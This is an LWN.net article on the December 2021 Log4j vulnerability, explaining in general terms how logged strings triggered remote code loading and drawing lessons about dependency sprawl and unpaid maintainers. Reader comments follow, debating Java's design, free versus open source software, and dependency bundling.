|
|
Subscribe / Log in / New account

Lessons from Log4j

By Jonathan Corbet
December 16, 2021
By now, most readers will likely have seen something about the Log4j vulnerability that has been making life miserable for system administrators since its disclosure on December 9. This bug is relatively easy to exploit, results in remote code execution, and lurks on servers all across the net; it is not hyperbolic to call it one of the worst vulnerabilities that has been disclosed in some years. In a sense, the lessons from Log4j have little new to teach us, but this bug does highlight some problems in the free-software ecosystem in an unambiguous way.

What went wrong

There are a lot of articles describing the mechanics of this bug and how to exploit it in great detail; see this page for an extensive collection. In short: Log4j™ is a Java logging package trademarked and distributed by the Apache Software Foundation. It has found its way into many other projects and can be found all over the Internet. Indeed, according to this article, Log4j has been downloaded over 28 million times — in the last four months — and is a dependency for nearly 7,000 other projects. So a vulnerability in Log4j is likely to become a vulnerability in many other systems that happen to use it.

As the Apache Software Foundation proudly tweeted in June, it's even on the Ingenuity helicopter on Mars.

Normally, one thinks that a logging utility should accept data of interest and reliably log it. Log4j seemingly does this, but it also does something that, arguably, no logging system should do: it actively interprets the data to be logged and acts upon it. One thing it can do is query remote servers for data and include that in the log message. For example, it can obtain and incorporate data from an LDAP server, a feature that might be useful when one wishes to add data to the log that includes information about a user's account.

It turns out, though, that the remote directory server can supply other things, including serialized Java objects that will be reconstituted and executed. That turns this feature into a way to inject code into the running application that, presumably, only wanted to log some data. To exploit this opening, an attacker needs to do two things:

  • Put up a server running a suitable protocol in a place where the target system can reach it. LDAP seems to be the protocol of choice at the moment, but others are possible; a grep of LWN's logs shows attempts to use DNS as well.
  • Convince the target system to log an attacker-supplied string containing the incantation that will load and execute the object from the malicious server.

The second step above is often easier than it might seem; many systems will happily log user-supplied data. The hostile string may take the form of a user name that ends up in the log; the browser's user-agent string also seems to be a popular choice. Once the target takes the bait and logs the malicious string, the game is over.

This is, in other words, a case of interpreting unsanitized data supplied by the Internet, with predictable consequences; it is a failure that should have been caught in any reasonable review process. Note that the malicious strings can also be passed by front-end software to internal systems, which might then decide to log it. In other words, not being directly exposed to the Internet is not necessarily a sufficient defense for vulnerable systems. Every system using Log4j needs to be fixed, either by upgrading or by applying one of the other mitigations found in the above-linked article. Note that the initial fixes have proved to be insufficient to address all of the problems in Log4j; users will need to stay on top of the ongoing stream of updates.

The reaction to this vulnerability has been swift and strong. Some commenters are asserting that "open source is broken". Anybody who hadn't seen xkcd #2347 before has probably encountered it by now. Has our community failed as badly as some would have it? In short, there would appear to be two broad shortcomings highlighted by this episode, relating to dependencies and maintainers.

Dependencies galore

In the early days of free software, there simply was not much free code out there, so almost everything had to be written from scratch. At that time, thus, there were few vulnerable packages available for free download and use, so every project had to code up its own security bugs. The community rose to the challenge and, even in those more innocent days, security problems were in anything but short supply.

For as long as your editor has been in this field — rather longer than he cares to admit — developers and academics both have talked about the benefits of reusable software. Over the years, that dream has certainly been accomplished. Many language communities have accumulated a massive collection of modules for many common (and uncommon) tasks; writing a program often just becomes an exercise in finding the right modules and gluing them together correctly. Interfaces to repositories automate the process of fetching the necessary modules (and the modules they depend on). For those of us who, long ago, became used to the seemingly infinite loop of running configure then tracking down the next missing dependency, modern environments seem almost unfair. The challenge is gone.

This is a huge success for our community; we have created development environments that can be a joy to work within, and which allow us to work at a level of productivity that couldn't really be imagined some decades ago. There is a problem lurking here, though: this structure makes it easy for a project to accumulate dependencies on outside modules, each of which may bring some risks of its own. When you are, essentially, importing random code off the Internet into your own program, any of a number of things can happen. One of those modules could be overtly hostile (as happened with event-stream), it could simply vanish (left-pad), or it could just suffer from neglect, as appears to have happened with Log4j.

When the quality of the things one consumes is of concern, one tends to fall back to known brands. Log4j is developed under the Apache Software Foundation brand which, one might hope, would be an indicator of quality and active maintenance. Appearances can be deceiving, though; one need not look further than Apache OpenOffice, which continues to be downloaded and used despite having been almost entirely starved of development effort for years, for an example. OpenOffice users will be relieved to know, though, that (according to the project's October 2021 report) OpenOffice has finally managed to put together a new draft mission statement. Log4j is a bit more active than that, but it still depends on the free-time effort of unpaid maintainers. Apache brand or not, this project, which is widely depended on, has nobody paid to maintain it.

But, even if the brand signals were more reliable, the problem remains that it is hard to stay on top of hundreds of dependencies. A library that appeared solid and well maintained when it was adopted can look rather less appealing a year or two later, but projects lacking good maintenance often tend not to attract attention until something goes badly wrong. Users of such a project may not understand the increasing level of risk until it is too late. Our tooling makes adding dependencies easy (to the point that we may not even be aware of them); it is less helpful when it comes to assessing the maintenance state of our existing dependencies.

Maintainers

A related problem is lack of development and maintenance support for projects that are heavily depended on. The old comparison between free software and a free puppy remains on point; puppies are wonderful, but if somebody isn't paying attention they will surely pee on the carpet and chew up your shoes. It is easy to take advantage of the free-of-charge nature of free software to incorporate a wealth of capable code, but every one of those dependencies is a puppy that needs to be under somebody's watchful eye.

As a community, we are far better at acquiring puppies than we are at training them. Companies will happily take the software that is offered, without feeling the need to contribute back even to the most crucial components in their system. Actually, we all do that; there is no way for anybody to support every project that they depend on. We all get far more out of free software than we can possibly put back into it, and that is, of course, a good thing.

That said, there is also a case to be made that the corporate side of our ecosystem is too quick to take the bounty of free software for granted. If a company is building an important product or service on a piece of free software, it behooves that company to ensure that said software is well supported and, if need be, step up to make that happen. It is the right thing to do in general, but it is far from an altruistic act; the alternative is a continual stream of Log4j-like crises. Those, as many companies are currently discovering, are expensive.

"Stepping up" means supporting maintainers as well as developers; it is with maintainers that the problem is often most acute. Even a project like the Linux kernel, which has thousands of developers who are paid for their work, struggles to find support for maintainers. Companies, it seems, see maintainership work as overhead at best, helping competitors at worst, and somebody else's problem in any case. Few companies reward their employees for acting as maintainers, so many of them end up doing that work on their own time. The result is projects with millions of downloads whose maintenance is done in somebody's free time — if it is done at all.

These problems are not specific to free software; discovering that a piece of proprietary software is not as well supported as was claimed is far from unheard of. Free software, at least, can be fixed even in the absence of cooperation from its creators. But the sheer wealth of software created by our community makes some of these problems worse; there is a massive amount of code to maintain, and little incentive for many of its users to help make that happen. We will presumably get a handle on these issues at some point, but it's not entirely clear how; until that happens, we'll continue deploying minimally supported software to Mars (and beyond).


to post comments

it's even on the Ingenuity helicopter on Mars

Posted Dec 16, 2021 17:26 UTC (Thu) by beckmi (subscriber, #87001) [Link] (2 responses)

Do we now have to hope that Mars hasn't hacked us yet?
How credible are the images from Ingenuity now?
Where is Perseverance going?
;)

it's even on the Ingenuity helicopter on Mars

Posted Dec 16, 2021 23:09 UTC (Thu) by benhoyt (subscriber, #138463) [Link] (1 responses)

It seems very likely to me that NASA has thought about this issue, and there's no way to send public user input to Ingenuity. A NASA Ingenuity staff member could almost certainly exploit it, but they could probably also take down the helicopter any time by sending a code update too. I definitely don't have any insider info on this, so would be keen to hear more about Ingenuity's software and network security measures if anyone has a link.

it's even on the Ingenuity helicopter on Mars

Posted Dec 17, 2021 10:17 UTC (Fri) by georgm (subscriber, #19574) [Link]

Hold a sheet of paper with a prepared message in front of the camera of Ingenuity and hope they log some OCR results ;)

Lessons from Log4j

Posted Dec 16, 2021 17:49 UTC (Thu) by dskoll (subscriber, #1630) [Link] (3 responses)

OpenOffice has finally managed to put together a new draft mission statement

Burn... :)

Lessons from Log4j

Posted Dec 16, 2021 17:55 UTC (Thu) by smurf (subscriber, #17840) [Link] (1 responses)

Their sincerety will entirely be measured by how close that statement will be to "we admit that the whole AOo mess has been a load of disingeniuos BS and the subproject is hereby disbanded".

Lessons from Log4j

Posted Dec 16, 2021 20:22 UTC (Thu) by NYKevin (subscriber, #129325) [Link]

The linked minutes do not suggest that they plan to do that. In fact, they say that they are now publishing AOO in the Microsoft Store, although when I searched for it, I was only able to find a third-party repackaged version (with a list price of $70, "discounted" to $10, so someone is apparently making a killing off of this...). There was also one for LibreOffice, which is apparently cheaper at $10, "discounted" to $4.60.

Lessons from Log4j

Posted Dec 17, 2021 8:51 UTC (Fri) by thoeme (subscriber, #2871) [Link]

RE: OpenOffice. This reminded me of LibreOffice, my use of it on my Linux machines (not everyday, but still frequently enough) so I sent them (*LibreOffice*) a financial Christmas present.

Lessons from Log4j

Posted Dec 16, 2021 18:13 UTC (Thu) by pj (subscriber, #4506) [Link] (1 responses)

>Companies, it seems, see maintainership work as overhead at best, helping competitors at worst,

Companies see it that way because developers see it that way: most developers consider their job to be 'writing code'... but it's more than that: it's debugging, it's testing, it's ticket-status updates (be it a bug ticket or a feature 'ticket'), it's code review (really just a form of pre-emptive debugging), etc. While writing code may be the most enjoyable part of the job - who doesn't like a good dose of flow state? - it's certainly not the _entire_ job, and that message needs to be spread around more.

Lessons from Log4j

Posted Dec 16, 2021 21:40 UTC (Thu) by hkario (subscriber, #94864) [Link]

Exactly, good engineering is boring, and people don't like boring work (see also: List of discontinued Google products).

I'm sure that there are dozens upon dozes of similarly under-maintained proprietary libraries in the corporate world, but because they're closed source, nobody is looking for bugs in them, and even if the "red team" does find it, hardly anyone will learn that lack of maintenance was the root cause.

Lessons from Log4j

Posted Dec 16, 2021 18:21 UTC (Thu) by rgmoore (✭ supporter ✭, #75) [Link] (1 responses)

At that time, thus, there were few vulnerable packages available for free download and use, so every project had to code up its own security bugs. The community rose to the challenge and, even in those more innocent days, security problems were in anything but short supply.

I just wanted to highlight this aside as an example of the kind of thing that keeps me a subscriber. The wit is very dry, but we do notice and enjoy it. Keep up the good work!

Lessons from Log4j

Posted Dec 21, 2021 11:00 UTC (Tue) by fmyhr (subscriber, #14803) [Link]

Seconded! That was my favorite section of this excellent article. :-)

All the same, I wish our Editor could have worked in the name (and better a link) to LibreOffice. The dig at OO was very much deserved, but perhaps too subtle to those unfamiliar with the situation. Which, let's face it, could be any reader -- given how large the "firehose" has become.

Lessons from Log4j

Posted Dec 16, 2021 19:09 UTC (Thu) by mtaht (subscriber, #11087) [Link] (3 responses)

When redhat went public, they gave out 500 shares to everyone that had made a kernel contribution. Had that become a model for other companies building on open source software, we'd all be comfortably maintaining and improving our code today, and teaching and paying the next generation to take over.

Lessons from Log4j

Posted Dec 17, 2021 9:38 UTC (Fri) by LtWorf (subscriber, #124958) [Link] (2 responses)

Companies: "Please use MIT license to widen adoption"
Also companies: "We will never contribute any code or money to your project"

Lessons from Log4j

Posted Dec 18, 2021 23:40 UTC (Sat) by NYKevin (subscriber, #129325) [Link] (1 responses)

Also also companies: "Your software (that we haven't paid for) is poorly maintained and lacks [feature X], please improve it."

Lessons from Log4j

Posted Dec 20, 2021 18:29 UTC (Mon) by jengelh (guest, #33263) [Link]

I'll bite. As seen from the perspective of businesses, end-users also be like: "I really like the FLOSS software you make. Your project lacks some $X and it would be really important to me to start a subscription/whatever, but because it's missing I am hesitant to effectively make $X happen either by way of a patch or the aforementioned subscription."

Lessons from Log4j

Posted Dec 16, 2021 19:32 UTC (Thu) by cyperpunks (subscriber, #39406) [Link] (8 responses)

Is it really a maintainer problem? Or is it intrinsic problem in the design of Java?

https://twitter.com/isotopp/status/1470668771962638339

Standing on the fragil shoulders of giants

Posted Dec 16, 2021 22:41 UTC (Thu) by noxxi (subscriber, #4994) [Link] (4 responses)

log4j just has the same philosophy as the Java stack they are build on: Flexibility trumps security.

It is not that log4j enables the code execution - it is instead the permissive design of JNDI combined with the powerful und known problematic object deserialization of Java. None of this is new - log4j just made it more accessible for exploits. It wasn't the first time that these mechanisms were found exploitable and I doubt it will be the last time.

Standing on the fragil shoulders of giants

Posted Dec 17, 2021 13:39 UTC (Fri) by developer122 (guest, #152928) [Link] (1 responses)

All of that would not have occurred without a double evaluation vulnerability.

Standing on the fragil shoulders of giants

Posted Dec 18, 2021 19:18 UTC (Sat) by ms-tg (subscriber, #89231) [Link]

Agree, this is Both-And, rather than either-or

Standing on the fragil shoulders of giants

Posted Dec 17, 2021 13:43 UTC (Fri) by k3ninho (subscriber, #50375) [Link] (1 responses)

>It is not that log4j enables the code execution
I can't get past this thought. Arguably it *is* that log4j treats logged strings as anything other than dead data to log, but a common pattern involves anonymous functions streaming to StringBuilder inside the logging method. When that's allowable, the community is unwittingly enabling the creation of a culture where you *can* follow this pattern so nobody trains StackOverflow with answers why it's a bad idea to follow that pattern.

The best response to this is to talk about user/attacker-supplied data as something you expect to be an attack vector, set the expectation that we restrict the processing of that input data to simple substitutions. Talk about the Chomsky Hierarchy, with strong warnings against Turing Completeness, so that people don't create processing of hostile data that's exploitable. If we talk about those things, the cultural expectations change so people will ask "how can this user-supplied input work against me?"

K3n.

Standing on the fragil shoulders of giants

Posted Dec 18, 2021 2:21 UTC (Sat) by ssmith32 (subscriber, #72404) [Link]

You don't need to follow that pattern to exploit this. Simply logging unsanitized, user-controlled data with log4j is what allows this.

And you do need to be running a version of the JVM/JDK (1.8, and actually a few patch versions behind the latest 1.8), that has been deprecated / unsupported for a few years now.

At least to exploit it in the fashion being described everywhere. Later versions of the JVM/JDK reportedly are still vulnerable, but you need to use in memory gadgets, which is a bit harder then running code off an LDAP server you host.

Although I have to wonder how many attackers set up a LDAP server to host their attacks... that was running on an old version of the JVM.. that used log4j...

Lessons from Log4j

Posted Dec 18, 2021 2:23 UTC (Sat) by ssmith32 (subscriber, #72404) [Link] (1 responses)

It's not intrinsic to the design of Java. In fact, the JDK /JVM fixed this path a while ago. But people like running on deprecated JVMs...

Lessons from Log4j

Posted Dec 21, 2021 16:26 UTC (Tue) by msw (guest, #3733) [Link]

There is some misinformation running around that newer versions of the JVM "fix" the problem through changing the defaults for com.sun.jndi.cosnaming.object.trustURLCodebase and com.sun.jndi.rmi.object.trustURLCodebase. Those protections are incomplete, depending on the application and its dependencies. For example, the XBean BeanFactory that is bundled with Tomcat is a known attack vector when combined with the Log4j problems, even when you are running on the latest JVMs with the more secure defaults. Ref: https://www.openwall.com/lists/oss-security/2021/12/10/2

Lessons from Log4j

Posted Dec 18, 2021 22:42 UTC (Sat) by gfernandes (subscriber, #119910) [Link]

You mean bad design like this?
http://yosefk.com/c++fqa/

Lessons from Log4j

Posted Dec 16, 2021 20:15 UTC (Thu) by erwaelde (subscriber, #34976) [Link]

> A related problem is lack of development and maintenance support for projects that are heavily depended on.

I'm not sure this is the whole thing. Reviewing or auditing "free(beer)" components from external is not high on the list of (project) management. In my humble opinion this is a big part of this mess.

Lessons from Log4j

Posted Dec 16, 2021 20:21 UTC (Thu) by HenrikH (subscriber, #31152) [Link] (13 responses)

"open source is broken" - Quite rich considering the amount of proprietary software that apparently had zero problems incorporating Log4j... On a more serious note I fail to see how a proprietary version of Log4j would make any difference what so ever.

Lessons from Log4j

Posted Dec 16, 2021 20:48 UTC (Thu) by rahulsundaram (subscriber, #21946) [Link] (4 responses)

> On a more serious note I fail to see how a proprietary version of Log4j would make any difference what so ever

Far less adoption would have made a large difference.

Lessons from Log4j

Posted Dec 17, 2021 9:04 UTC (Fri) by eru (subscriber, #2753) [Link] (1 responses)

On an alternate timeline with no open source, small shared components like log4j would not exist (never mind trivialities like the infamous left-pad). Licensing them would be too much bother, so purchases would be done only for larger pieces of software. Instead, companies would use the facilities in the OS or language runtime they use, and if not sufficient, roll their own.

In general, the alternate timeline would have less, and more expensive software. Hard to say if it would be of higher quality.

Lessons from Log4j

Posted Dec 28, 2021 15:40 UTC (Tue) by jd (guest, #26381) [Link]

In theory, we can judge whether it would be higher quality by looking at defect density.

I found a report from 2013 which states: "Code quality for open source software continues to mirror code quality for proprietary software: For the second consecutive year, code quality for both open source and proprietary software code was better than the generally accepted industry standard defect density for good quality software of 1.0. defect density (defects per 1,000 lines of code, a commonly used measurement for software quality). Open source software averaged a defect density of .69, while proprietary code (a random sampling of code developed by enterprise users) averaged .68."

Open Source did better, according to another report. "In fact, the most recent report (2013) found open source software written in C and C++ to have a lower defect density than proprietary code. The average defect density across projects of all sizes was 0.59 for open source, and 0.72 for proprietary software.

Yet other reports give other figures. "Defect density (defects per 1,000 lines of code) of open source code and commercial code has continued to improve since 2013: When comparing overall defect density numbers between 2013 and 2014, the defect density of both open source code and commercial code has continued to improve. Open source code defect density improved from 0.66 in 2013 to 0.61 in 2014, while commercial code defect density improved from 0.77 to 0.76."

Bear in mind that all three reports are basing their 2013 figures on the same 2013 analysis by Coverity and all three manage to give different numbers. Since the link to Coverity's report no longer works, I cannot tell you if any of them are correct.

Nonetheless, two of the three give better defect density levels to open source software, with the third being essentially equal. We can certainly use that to say that the commercial software examined certainly wasn't better and may have been worse. Of course, a lot can happen in 8 years, almost 9, and I can't find anything later than 2014.

So if we can't rely on tech articles, maybe we can look at methodology. Power of Ten and the CERT Guidelines for Secure Software would seem logical places to start. I do not, personally, know anyone who adheres to either and I've worked for a decent selection of companies. However, anecdotal evidence isn't worth much and it could be that everywhere else on the planet does. It may be a decent selection, but it's not really random and it's certainly not verifiable. Are there any surveys out there? Then there are rulesets like MISRA, which has fans and haters.

PRQA seems to have been seized by Perforce and previously free-to-read coding standards now seem to be locked up, so I have no idea what they currently are. ( The 2005 JSF rules are here: https://www.stroustrup.com/JSF-AV-rules.pdf - if they're as rapidly developing as Lockheed-Martin imply in one online presentation, these are well out of date.) All I can tell you with any confidence is that no open source coder, and very few professionals, have bought the Perforce suite as their software control system and are using the code analyzer to spot defects. It may be possible to use Helix QAC with Git, but I don't see anything to indicate that.

What I'm getting out of this is that the scene is messy, that a fair amount of the advice is apocryphal or at least wildly inaccurate (so a great starting point for budding galactic hitchhikers), that very few people are using the tools that do exist and that even when everything meshes just right, nobody seems to know what the results are.

I do sincerely hope that it's not as bleak as all that, but I'm worried it might actually be worse.

Lessons from Log4j

Posted Dec 18, 2021 2:25 UTC (Sat) by ssmith32 (subscriber, #72404) [Link] (1 responses)

Ah I see. We just need to stop using programmable Turing machines, and we'll be fine :P

Lessons from Log4j

Posted Dec 18, 2021 10:06 UTC (Sat) by Wol (subscriber, #4433) [Link]

Yup. When all you have is a hammer everything looks like a nail ...

Recognise a Turing Machine for what it is - a security nightmare. And DON'T USE IT WHEN IT'S NOT APPROPRIATE.

Cheers,
Wol

Lessons from Log4j

Posted Dec 17, 2021 10:33 UTC (Fri) by rsidd (subscriber, #2582) [Link] (7 responses)

The "brokenness" in the linked article refers to the same thing the xkcd cartoon refers to. ie, not the code itself, but the freeloaders who don't contribute back, and turn one guy's spare-time project into a critical brick supporting the internet.

Lessons from Log4j

Posted Dec 17, 2021 14:55 UTC (Fri) by ebassi (subscriber, #54855) [Link] (6 responses)

> freeloaders who don't contribute back

Isn't that the entire point of "open source software" as opposed to "free software"?

Lessons from Log4j

Posted Dec 17, 2021 16:08 UTC (Fri) by mathstuf (subscriber, #69389) [Link] (5 responses)

Eh, nothing in "free software" requires that the code actually be contributed back (with whatever gauntlet needs to be run to do that), just available. And sure, it'd be available, but I imagine it would usually be a "pull" policy rather than a "push" policy for any actors which don't do it under "open source" already.

Lessons from Log4j

Posted Dec 17, 2021 17:37 UTC (Fri) by pebolle (guest, #35204) [Link] (3 responses)

> Eh, nothing in "free software" requires that the code actually be contributed back [...] just available.

Exactly.

Free Software proponents are, or at least should, be fine with people only consuming Free Software. I think not contributing, not funding, not reporting bugs, etc. should be all acceptable to them. Their philosophy is that all software should be free.

Open Source's philosophy is that Open Source will lead to higher quality software.

From a Free Software perspective accidents like this are not special. Its supporters like bug-free software, just like everyone else! From an Open Source perspective accidents like this are more challenging. They are at odds with their philosophy.

Lessons from Log4j

Posted Dec 20, 2021 18:30 UTC (Mon) by NYKevin (subscriber, #129325) [Link] (1 responses)

The Open Source response is essentially that there's no free lunch. When an open source project is poorly maintained, this is often a result of nobody contributing to it. Compared on equal terms, open source development is superior to proprietary development, but in order for that to be a fair comparison, you need to be throwing equal amounts of time, money, and person-hours at both methods. In practice, many companies are unwilling to do that, but that's not a failing in open source itself.

Lessons from Log4j

Posted Dec 20, 2021 23:36 UTC (Mon) by pebolle (guest, #35204) [Link]

> The Open Source response is essentially that there's no free lunch. When an open source project is poorly maintained, this is often a result of nobody contributing to it.

Am I reading you in bad faith if I say this translates to: if you open sourced harder it wouldn't have happened?

> Compared on equal terms, open source development is superior to proprietary development

I was taught that Open Source was a reaction to Free Software. Both are alternatives to proprietary software, of course, but Open Source should be evaluated on its promise to yield better results while Free Software on its promise to yield more freedom.

(I think LWN.net almost never covers software that is Open Source but not Free Software so let's ignore that niche.)

My point was that in cases like this, where (free and open) software turns out to be buggy the proponents of Open Source have some explaining to do. And open source harder explains very little as it will be always true.

Lessons from Log4j

Posted Dec 21, 2021 9:40 UTC (Tue) by drnlmza (subscriber, #60245) [Link]

> Free Software proponents are, or at least should, be fine with people only consuming Free Software. I think not contributing, not funding, not reporting bugs, etc. should be > all acceptable to them. Their philosophy is that all software should be free.

Sure, not contributing back is fine, but there's also an corresponding "no warranty" clause in most licenses. The problem is no-one contributing back and everyone expecting that all problems will magically be fixed without any active effort, which is not how the world works.

Lessons from Log4j

Posted Dec 17, 2021 19:04 UTC (Fri) by Wol (subscriber, #4433) [Link]

And there's no obligation in Free Software to contribute back, either.

There is an obligation to contribute *forward*, but that's subtly (and critically) different.

Cheers,
Wol

Dependency bundling

Posted Dec 16, 2021 20:38 UTC (Thu) by bkw1a (subscriber, #4101) [Link] (36 responses)

I hope that after these fires have been put out we all sit down and have a serious re-think about the downside of bundling dependencies. If the current problem could just be solved by installing one upgraded package it would be much less serious. Instead, scanning a random workstation I find 41 separate instances of log4j. There are clearly advantages to bundling up all of the dependencies in your installation kit, but eventually we run into situations like this, where every piece of software using a dependency has to issue its own, separate update.

In the Windows and Mac world there's never been good package management, so this kind of thing is inevitable. It would be great if the current crisis encourages developers in that realm to think about how that can be improved.

But even in the Linux world we're leaning more and more on snaps and flatpaks, making such problems more likely there, too. These tools are great, but we need to think about the trade-offs and be prepared to deal with the consequences.

The problem is, we don't just have one unsupervised puppy, we have 101 dalmations.

Dependency bundling

Posted Dec 16, 2021 21:03 UTC (Thu) by developer122 (guest, #152928) [Link] (19 responses)

Minor note, but it would indeed have been nice if we could fix once, update everywhere.

Dependency bundling

Posted Dec 17, 2021 7:43 UTC (Fri) by ras (subscriber, #33059) [Link] (18 responses)

This is trite, but as a DD I feel compelled to say - you have heard of Debian?

It's a Linux distribution that afaict, is staffed mostly by sysadmin's.

Some sysadmins are so anal about the "fix once, update everywhere" thing they have rules like: all software installed on my production boxes is either written in house, or is installed via a .deb with the dependencies supplied by Debian packages. Don't have a .deb - make one yourself. With ed, if necessary.

Every so often a young wet behind the years programmer will insist to a wizened sysadmin this bureaucracy from last fortnight is stifling his creativity, and the wizened sysadmin's eyebrows will quiver, rising above his monitor so the bristles point straight towards the young'ins eyeballs, and with a long soft sigh in his voice he will say "get off my lawn and keep that attitude away from my metal, kid".

And the kid will do that just, setting up the smoothest and slickest web site you ever did see running completely serverless, and he will monitor everything with log4j, occasionally glancing at it with his ipady thingy while sipping coconut juice prepared by a sweet young thing in a shady spot with good 5G; and thusly and surely, his users private data will make its way to the dark corners of the web where they make good money trading such things.

And the newspapers will have headlines demanding justice and vengeance against the nerds who had the gall to create the systems the users love to use and do it in internet time. And then after due consideration another nerd will say "why don't we do fix once update everywhere?".

Dependency bundling

Posted Dec 17, 2021 8:13 UTC (Fri) by joib (subscriber, #8541) [Link] (15 responses)

Insert "Old man yells at cloud meme".

Perhaps distros could engage in some introspection why developers have abandoned relying on the distro packages to the extent they have, and what could distros do about it? Bonus points if you can do it without the kneejerk CADT response.

Dependency bundling

Posted Dec 17, 2021 10:04 UTC (Fri) by LtWorf (subscriber, #124958) [Link] (3 responses)

People are lazy.

Nobody will follow best practices if they are not enforced.

Of course product management is happier to bundle stuff, because it leads to being faster. And developers are fine with that because they won't need to learn how to package software.

Everyone is happy until disaster happens :D

Dependency bundling

Posted Dec 18, 2021 2:30 UTC (Sat) by ssmith32 (subscriber, #72404) [Link] (1 responses)

Yeah, but if running outdated JVMs because the latest are available as debs on "stable" is what makes you vulnerable.. because you're too lazy to emerge your whole system from the latest source every night ..

People have very different ideas of best practice..

Dependency bundling

Posted Dec 18, 2021 16:30 UTC (Sat) by LtWorf (subscriber, #124958) [Link]

Distributions all have security teams and ship fixes to the packages.

On the other hand version pinning makes sure that security fixes will never reach your product.

Dependency bundling

Posted Dec 18, 2021 11:02 UTC (Sat) by Wol (subscriber, #4433) [Link]

> Nobody will follow best practices if they are not enforced.

(1) Because "best practice" often isn't.
(2) Because if you're young (and "foolish") you don't understand the concept.
(3) Because if you haven't been burnt you don't see the point.
And, rather importantly
(4) if you're a manager it's someone else's problem...

That's why greybeards do it and newbies don't ...

Cheers,
Wol

Dependency bundling

Posted Dec 17, 2021 20:40 UTC (Fri) by khim (subscriber, #9252) [Link] (9 responses)

> Bonus points if you can do it without the kneejerk CADT response.

Even if is the reason for that phenomemon?

> Perhaps distros could engage in some introspection why developers have abandoned relying on the distro packages to the extent they have

Because it's the only way to create cross-distro and cross-version binary. And that's what you want both if you want to give you program to the user (most of which are not progammers and don't know how to compile anything) or if you want to use program in-house and retain the ability to upgrade OS without hassle (attempt to rely on distro-provided libraries would lead to pain with installation on upgraded OS because certain versions of certain libraries would become unavailable).

> and what could distros do about it?

An SDK. Some way to build binary which you may build once and use forever. Or, if not forever then at least for 5-10 years.

That's what all OSes are providing, just not Linux distributions.

That's the bare minimum. If you want to make sure developers wouldn't try to bundle libraries which are not in your base SDK then then would need some cross-distro and cross-version way to deliver other libraries.

That's even harder, I don't know any OS which managed to pull that off. Flakpak is trying, AFAIK.

Dependency bundling

Posted Dec 18, 2021 11:31 UTC (Sat) by joib (subscriber, #8541) [Link] (1 responses)

> Even if is the reason for that phenomemon?

Yes. Because insulting developers will only alienate developers further and ensures that whatever good points distros might have about maintainability and dependency management will fall on deaf ears.

> An SDK.

> Flakpak is trying, AFAIK.

Yes, something like that. Flatpak is probably the best shot in the desktop space.

In the server world, I don't know. Developers using "modern" languages really love things like cargo+crates.io/NPM/whatever, and for good reasons. The challenge is how to integrate those models with some trusted third party (call it a "distro" or whatever), that would ensure long-term maintenance and security updates for some particular versions of particular packages. Oh, and some kind of "apt-get upgrade" type mechanism to semi-automatically rebuild applications with bundled dependencies due to security updates in the dependencies.

Dependency bundling

Posted Dec 18, 2021 23:52 UTC (Sat) by NYKevin (subscriber, #129325) [Link]

> Yes. Because insulting developers will only alienate developers further and ensures that whatever good points distros might have about maintainability and dependency management will fall on deaf ears.

For $DEITY's sake, even Steve Ballmer had this figured out. Remember the "Developers, developers, developers!" line? You could have the greatest operating system in the world, but it doesn't matter if nobody wants to write code for it.

Dependency bundling

Posted Dec 19, 2021 0:43 UTC (Sun) by NYKevin (subscriber, #129325) [Link] (6 responses)

> If you want to make sure developers wouldn't try to bundle libraries which are not in your base SDK then then would need some cross-distro and cross-version way to deliver other libraries.

In the proprietary world, this is a solved problem. It's called "You can't bundle it or else our lawyers will sue your pants off. Instead, every end user must download the package from upstream, which is installed in a single standard location, and if your OS/app/whatever doesn't like that standard location, then that's your problem."

Before anyone asks: New versions are handled as if they were entirely unrelated packages. You can easily end up with dozens of these "Microsoft C++ Redistributable" nonsense packages on a single Windows box.

Dependency bundling

Posted Dec 19, 2021 1:11 UTC (Sun) by khim (subscriber, #9252) [Link] (3 responses)

Except, of course, these runtimes not only can be bundled, but they were designed to be bundled from very early days. And yes, they, sometimes, needed crazy tricks to support these bundled runtimes.

Yet you always had an option to bundle them and you still have that option even today.

> Instead, every end user must download the package from upstream, which is installed in a single standard location, and if your OS/app/whatever doesn't like that standard location, then that's your problem.

They only tried to push that approach after taking 90%+ of desktop. After they achieved, essentially, a monopoly. And even then the end result was near disaster: that's how they lost the title of leading desktop platform platform to the web (Ironically enough, after killing Netscape).

And web, the platform that won the title of most popular platform on desktop, for now, is all about bundling dependencies.

GNU/Linux never had a monopoly, yet it tried to put much harsher requirements on developers. This flew like a lead balloon: most apps today they are developed for web or Windows and macOS, only tiny percentage supports Linux.

Dependency bundling

Posted Dec 19, 2021 2:57 UTC (Sun) by NYKevin (subscriber, #129325) [Link] (2 responses)

IMHO that doesn't count as "bundling" because, in most cases, at least on modern systems, the thing that is bundled is a binary blob self-extracting installer you got from upstream, and you are in no way allowed to just install random DLLs into your Program Files directory. The installer puts the library in a fixed place, ergo every user's machine has exactly one copy of it... that is, one per backwards-incompatible version of the silly thing, so in practice twelve-ish.

Sometimes, there isn't even a reasonable way to determine whether the thing is already installed or not, so you end up doing extra-crazy things like re-running the same installer over and over again (see https://help.steampowered.com/en/faqs/view/2BED-4784-8C0A...).

Dependency bundling

Posted Dec 19, 2021 14:19 UTC (Sun) by khim (subscriber, #9252) [Link] (1 responses)

> IMHO that doesn't count as "bundling" because, in most cases, at least on modern systems, the thing that is bundled is a binary blob self-extracting installer you got from upstream, and you are in no way allowed to just install random DLLs into your Program Files directory.

That was always an option, not the requirement. That's why, after you wrote that, I went and verified, that /MT is where it was always been. Even with just released Visual Studio 2022.

> Sometimes, there isn't even a reasonable way to determine whether the thing is already installed or not, so you end up doing extra-crazy things like re-running the same installer over and over again (see https://help.steampowered.com/en/faqs/view/2BED-4784-8C0A...).

Ah. Thanks for providing that link. Now, please go read what's written there yourself. Yes, with DirectX it's done like that. And, later, the trick was repeated with .NET framwork.

But there are extremely important difference between what was done there and in Linux world. Microsoft decided from the very beginning that there would be one DirectX and one .NET runtime (later they added few more, but the original ones still are all supported). And they ensured that programs built for DirectX 1.0 (released in 1995, remember?) still would work today (there are some bugs which may prevent it, but there were no on-purpose breakage since 1995, for quarter-century).

And when they had that promise they started working on legal enforcements. And yes that combination of technical and legal solutions works.

What Linux libraries can you name which are supporting similar technical promises? GLibC? Well, congrats: even most super-duper-bundle-savvy apps very rarely bring their own version of GlibC. Even if, technically and legally, they can.

The important part of the solution (outlined in the link you have shared, ironically enough) was not done for GLibC (there are no way to bring your own version of GlibC and install it), but glacial speed of development worked as an adequate substitute: GlibC is so low-level and changes so slowly that using 5 years old version is not too painful.

